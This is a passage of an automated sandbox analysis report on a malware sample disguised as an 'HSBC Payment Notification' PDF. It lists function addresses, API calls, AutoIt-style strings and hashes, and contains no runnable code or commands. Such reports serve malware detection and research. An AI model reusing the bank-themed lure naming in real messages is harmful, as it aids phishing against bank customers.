                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: CloseOpenQueryValue
                                                                                                                                                    • String ID: Control Panel\Mouse
                                                                                                                                                    • API String ID: 3677997916-824357125
                                                                                                                                                    • Opcode ID: fddb709fe4a1b7e3bb6eda9662e0779279b58f522ad42de317fca39f37a0c6b5
                                                                                                                                                    • Instruction ID: b1ff216ba3ee978410a1c1c06e663b0c2c98cd46aaa17f39490786bf8a1b1252
                                                                                                                                                    • Opcode Fuzzy Hash: fddb709fe4a1b7e3bb6eda9662e0779279b58f522ad42de317fca39f37a0c6b5
                                                                                                                                                    • Instruction Fuzzy Hash: 84114871510208BFDB20CF64DC409AFBBBCEF45741F10486AE805E7250D6729E449768
                                                                                                                                                    Function 0046955B Relevance: 6.2, APIs: 4, Instructions: 155COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 00404EE5: _fseek.LIBCMT ref: 00404EFD
                                                                                                                                                      • Part of subcall function 00469734: _wcscmp.LIBCMT ref: 00469824
                                                                                                                                                      • Part of subcall function 00469734: _wcscmp.LIBCMT ref: 00469837
                                                                                                                                                    • _free.LIBCMT ref: 004696A2
                                                                                                                                                    • _free.LIBCMT ref: 004696A9
                                                                                                                                                    • _free.LIBCMT ref: 00469714
                                                                                                                                                      • Part of subcall function 00422D55: RtlFreeHeap.NTDLL(00000000,00000000,?,00429A24), ref: 00422D69
                                                                                                                                                      • Part of subcall function 00422D55: GetLastError.KERNEL32(00000000,?,00429A24), ref: 00422D7B
                                                                                                                                                    • _free.LIBCMT ref: 0046971C
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1346068077.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.1346050215.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346129159.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346129159.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346185113.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346205957.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346239799.00000000004E9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346336697.00000000004F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: _free$_wcscmp$ErrorFreeHeapLast_fseek
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 1552873950-0
                                                                                                                                                    • Opcode ID: 83a1bf45cb5b46f0fbbb2b282febcfcf75e63ad05b5baa694a85d9b23f0f737c
                                                                                                                                                    • Instruction ID: ca2eec8eb8578c2366e6fbf42eaf411172dd757ca1b938988fe54b4571807f9b
                                                                                                                                                    • Opcode Fuzzy Hash: 83a1bf45cb5b46f0fbbb2b282febcfcf75e63ad05b5baa694a85d9b23f0f737c
                                                                                                                                                    • Instruction Fuzzy Hash: 88515EB1904219ABDF249F65DC81A9EBB79EF88304F1044AEF209A3241DB755E90CF59
                                                                                                                                                    Function 0042470A Relevance: 6.1, APIs: 4, Instructions: 136COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1346068077.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.1346050215.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346129159.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346129159.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346185113.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346205957.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346239799.00000000004E9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346336697.00000000004F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: __flsbuf__flush__getptd_noexit__write_memmove
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 2782032738-0
                                                                                                                                                    • Opcode ID: 998aeda2236a74d80706e5f9a46343bd1135ee917ddd04e378ba6ed458c3dace
                                                                                                                                                    • Instruction ID: 7e2b6cc7ad03bd9c76499a1e37937a2f988b0f8539bc111f38111bac958280d8
                                                                                                                                                    • Opcode Fuzzy Hash: 998aeda2236a74d80706e5f9a46343bd1135ee917ddd04e378ba6ed458c3dace
                                                                                                                                                    • Instruction Fuzzy Hash: 9341D434B006659BDB189F69E88096F7BA5EFC2364B50813FE82587640DB78DD418B48
                                                                                                                                                    Function 00404C70 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 141COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1346068077.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.1346050215.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346129159.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346129159.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346185113.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346205957.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346239799.00000000004E9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346336697.00000000004F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: _memmove
                                                                                                                                                    • String ID: AU3!P/I$EA06
                                                                                                                                                    • API String ID: 4104443479-1914660620
                                                                                                                                                    • Opcode ID: 8014d3fb356ffbf6754ed2c01cea3d798000f8d72259ce0527afa311c47bbb91
                                                                                                                                                    • Instruction ID: ff6ab1fe0fa27ea81cbcababf34b5742e04188ff143208347500ec0318cc5285
                                                                                                                                                    • Opcode Fuzzy Hash: 8014d3fb356ffbf6754ed2c01cea3d798000f8d72259ce0527afa311c47bbb91
                                                                                                                                                    • Instruction Fuzzy Hash: F1418AB1A0415867DB219B6498517BF7BA19FC5304F28407BEE82BB3C2D63C5D4583AA
                                                                                                                                                    Function 00407285 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 65COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • _memset.LIBCMT ref: 0043EA39
                                                                                                                                                    • GetOpenFileNameW.COMDLG32(?), ref: 0043EA83
                                                                                                                                                      • Part of subcall function 00404750: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00404743,?,?,004037AE,?), ref: 00404770
                                                                                                                                                      • Part of subcall function 00420791: GetLongPathNameW.KERNEL32(?,?,00007FFF), ref: 004207B0
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1346068077.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.1346050215.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346129159.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346129159.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346185113.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346205957.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346239799.00000000004E9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346336697.00000000004F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Name$Path$FileFullLongOpen_memset
                                                                                                                                                    • String ID: X
                                                                                                                                                    • API String ID: 3777226403-3081909835
                                                                                                                                                    • Opcode ID: f7a2dfced1c7fac4da1122c6cfde17308801e93c3a8658db5658365851755d62
                                                                                                                                                    • Instruction ID: baa1e7331fae4d359aac7897d23b5e8ce5a65ce190648e6f88e75d23560a4c0c
                                                                                                                                                    • Opcode Fuzzy Hash: f7a2dfced1c7fac4da1122c6cfde17308801e93c3a8658db5658365851755d62
                                                                                                                                                    • Instruction Fuzzy Hash: 4421A471A102589BCB41DF95D845BDE7BF8AF49314F00806FE508B7281DBB85989CFAA
                                                                                                                                                    Function 0041092D Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 52COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,00403C14,004C52F8,?,?,?), ref: 0041096E
                                                                                                                                                      • Part of subcall function 00407BCC: _memmove.LIBCMT ref: 00407C06
                                                                                                                                                    • _wcscat.LIBCMT ref: 00444CB7
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1346068077.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.1346050215.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346129159.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346129159.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346185113.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346205957.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346239799.00000000004E9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346336697.00000000004F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: FullNamePath_memmove_wcscat
                                                                                                                                                    • String ID: SL
                                                                                                                                                    • API String ID: 257928180-181245872
                                                                                                                                                    • Opcode ID: 51d74b1989755c53183aee132601f2e45a628d82cf1f90107cdd3f9f5a0d9d06
                                                                                                                                                    • Instruction ID: 43824745660c3988bd5ee8fabd2b32f2c8f8042702d18c831ff1fab54f9b3e1b
                                                                                                                                                    • Opcode Fuzzy Hash: 51d74b1989755c53183aee132601f2e45a628d82cf1f90107cdd3f9f5a0d9d06
                                                                                                                                                    • Instruction Fuzzy Hash: ED118274A15208AACB40EB648945FDD77B8AF08354B0044ABB948E7291EAB8B6C4471D
                                                                                                                                                    Function 00468D91 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 51COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1346068077.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.1346050215.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346129159.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346129159.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346185113.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346205957.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346239799.00000000004E9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346336697.00000000004F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: __fread_nolock_memmove
                                                                                                                                                    • String ID: EA06
                                                                                                                                                    • API String ID: 1988441806-3962188686
                                                                                                                                                    • Opcode ID: 12b9eb2746c946ee24d761f12b33ae587f64773302ff2959e1666c5e9a364bcc
                                                                                                                                                    • Instruction ID: 3cd15271acb3b06ac884f373c06a49f445b450121f82016c471601618c020999
                                                                                                                                                    • Opcode Fuzzy Hash: 12b9eb2746c946ee24d761f12b33ae587f64773302ff2959e1666c5e9a364bcc
                                                                                                                                                    • Instruction Fuzzy Hash: 8F01F9719042287EDB18CAA9D816EFE7BFCDB11301F00459FF552D2181E878E6048764
                                                                                                                                                    Function 004698E3 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 16COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • GetTempPathW.KERNEL32(00000104,?), ref: 004698F8
                                                                                                                                                    • GetTempFileNameW.KERNEL32(?,aut,00000000,?), ref: 0046990F
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1346068077.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.1346050215.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346129159.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346129159.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346185113.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346205957.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346239799.00000000004E9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346336697.00000000004F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Temp$FileNamePath
                                                                                                                                                    • String ID: aut
                                                                                                                                                    • API String ID: 3285503233-3010740371
                                                                                                                                                    • Opcode ID: d3e801ab242beb6fec4b4f89e1aaff04be832202f3ef9fc21f6b566375e79959
                                                                                                                                                    • Instruction ID: d76eb4abf93f0e171a782776cb2de2514a1bc3ee8d101bd4a6c1c3d5b9ef8161
                                                                                                                                                    • Opcode Fuzzy Hash: d3e801ab242beb6fec4b4f89e1aaff04be832202f3ef9fc21f6b566375e79959
                                                                                                                                                    • Instruction Fuzzy Hash: D0D05E7954030DABDB50ABA0DC0EFDA773CE704700F0006F5BA54D10A1EAB1A5988BA9
                                                                                                                                                    Function 0047CADD Relevance: 4.9, APIs: 3, Instructions: 392COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1346068077.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.1346050215.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346129159.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346129159.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346185113.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346205957.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346239799.00000000004E9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346336697.00000000004F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: e563156e91e36691d5f4fcac2aaf6be647dac8c86d34431775506fe1d7328f76
                                                                                                                                                    • Instruction ID: 208f182f3c9136cc863dec11eab3d0960db0a10b8073f2b3425ab1c058278d8f
                                                                                                                                                    • Opcode Fuzzy Hash: e563156e91e36691d5f4fcac2aaf6be647dac8c86d34431775506fe1d7328f76
                                                                                                                                                    • Instruction Fuzzy Hash: 8AF13A716083019FC714DF29C480A6ABBE5FF88318F54892EF8999B392D734E945CF86
                                                                                                                                                    Function 0040434A Relevance: 4.6, APIs: 3, Instructions: 77windowCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • _memset.LIBCMT ref: 00404370
                                                                                                                                                    • Shell_NotifyIconW.SHELL32(00000000,?), ref: 00404415
                                                                                                                                                    • Shell_NotifyIconW.SHELL32(00000001,?), ref: 00404432
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1346068077.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.1346050215.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346129159.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346129159.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346185113.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346205957.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346239799.00000000004E9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346336697.00000000004F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: IconNotifyShell_$_memset
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 1505330794-0
                                                                                                                                                    • Opcode ID: 55e578eaf81f1082cb721cb8179a93cbba9ea3621e04278649df261dfa9eaab8
                                                                                                                                                    • Instruction ID: 448a70bf35e4549ae47872dc9eb977fea889799f7ce089bf6dae1479d4278b9a
                                                                                                                                                    • Opcode Fuzzy Hash: 55e578eaf81f1082cb721cb8179a93cbba9ea3621e04278649df261dfa9eaab8
                                                                                                                                                    • Instruction Fuzzy Hash: 4E3184B05047019FD760DF24D884A9BBBF8FB98308F00093FEA9A92391D7746944CB5A
                                                                                                                                                    Function 0042571C Relevance: 4.6, APIs: 3, Instructions: 59memoryCOMMONLIBRARYCODE
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • __FF_MSGBANNER.LIBCMT ref: 00425733
                                                                                                                                                      • Part of subcall function 0042A16B: __NMSG_WRITE.LIBCMT ref: 0042A192
                                                                                                                                                      • Part of subcall function 0042A16B: __NMSG_WRITE.LIBCMT ref: 0042A19C
                                                                                                                                                    • __NMSG_WRITE.LIBCMT ref: 0042573A
                                                                                                                                                      • Part of subcall function 0042A1C8: GetModuleFileNameW.KERNEL32(00000000,004C33BA,00000104,00000000,00000001,00000000), ref: 0042A25A
                                                                                                                                                      • Part of subcall function 0042A1C8: ___crtMessageBoxW.LIBCMT ref: 0042A308
                                                                                                                                                      • Part of subcall function 0042309F: ___crtCorExitProcess.LIBCMT ref: 004230A5
                                                                                                                                                      • Part of subcall function 0042309F: ExitProcess.KERNEL32 ref: 004230AE
                                                                                                                                                      • Part of subcall function 00428B28: __getptd_noexit.LIBCMT ref: 00428B28
                                                                                                                                                    • RtlAllocateHeap.NTDLL(00A60000,00000000,00000001,?,00000000,00000001,?,00420DD3,?,00000000,%I,?,00409E8C,?,?,?), ref: 0042575F
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1346068077.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.1346050215.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346129159.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346129159.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346185113.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346205957.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346239799.00000000004E9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346336697.00000000004F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: ExitProcess___crt$AllocateFileHeapMessageModuleName__getptd_noexit
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 1372826849-0
                                                                                                                                                    • Opcode ID: 173bc1eb0939af60788e3920f729a181213a4711687b08a62f5fb4dd74449d1b
                                                                                                                                                    • Instruction ID: 12628286b9c33790f0bcaf27d243d0f78d5a939af01e39ac9af769d2403f214a
                                                                                                                                                    • Opcode Fuzzy Hash: 173bc1eb0939af60788e3920f729a181213a4711687b08a62f5fb4dd74449d1b
                                                                                                                                                    • Instruction Fuzzy Hash: 8101D235380B31DADA102B36BC42A2E67588BC2766FD0043FF9059A281DE7C9D01866D
                                                                                                                                                    Function 004698A2 Relevance: 4.5, APIs: 3, Instructions: 24filetimeCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,00000080,00000000,?,?,00469548,?,?,?,?,?,00000004), ref: 004698BB
                                                                                                                                                    • SetFileTime.KERNEL32(00000000,?,00000000,?,?,00469548,?,?,?,?,?,00000004,00000001,?,?,00000004), ref: 004698D1
                                                                                                                                                    • CloseHandle.KERNEL32(00000000,?,00469548,?,?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 004698D8
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1346068077.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.1346050215.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346129159.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346129159.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346185113.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346205957.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346239799.00000000004E9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346336697.00000000004F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: File$CloseCreateHandleTime
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 3397143404-0
                                                                                                                                                    • Opcode ID: bd87c49bddbed0dd2230edd6d70eff61a4bb717c0cd42ce1b208173b53aacf55
                                                                                                                                                    • Instruction ID: c759ec0fed9c3a555ac5ec6521767d99e991bc38b38178bd45d0c2782cb34c4e
                                                                                                                                                    • Opcode Fuzzy Hash: bd87c49bddbed0dd2230edd6d70eff61a4bb717c0cd42ce1b208173b53aacf55
                                                                                                                                                    • Instruction Fuzzy Hash: 6EE08632140214B7D7212B54EC0DFDE7B19EB06760F144535FF14A90E087B12925979C
                                                                                                                                                    Function 00468D0D Relevance: 4.5, APIs: 3, Instructions: 22COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • _free.LIBCMT ref: 00468D1B
                                                                                                                                                      • Part of subcall function 00422D55: RtlFreeHeap.NTDLL(00000000,00000000,?,00429A24), ref: 00422D69
                                                                                                                                                      • Part of subcall function 00422D55: GetLastError.KERNEL32(00000000,?,00429A24), ref: 00422D7B
                                                                                                                                                    • _free.LIBCMT ref: 00468D2C
                                                                                                                                                    • _free.LIBCMT ref: 00468D3E
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1346068077.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.1346050215.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346129159.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346129159.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346185113.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346205957.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346239799.00000000004E9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346336697.00000000004F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 776569668-0
                                                                                                                                                    • Opcode ID: 625e2a9df38ff8793e00647abbe9ccf0d6414545c555b0c4696158d27d9f7751
                                                                                                                                                    • Instruction ID: 6b151060fb8ed88ed9ffdc5938a612973e117ec8253147f08314cae1c0c73c84
                                                                                                                                                    • Opcode Fuzzy Hash: 625e2a9df38ff8793e00647abbe9ccf0d6414545c555b0c4696158d27d9f7751
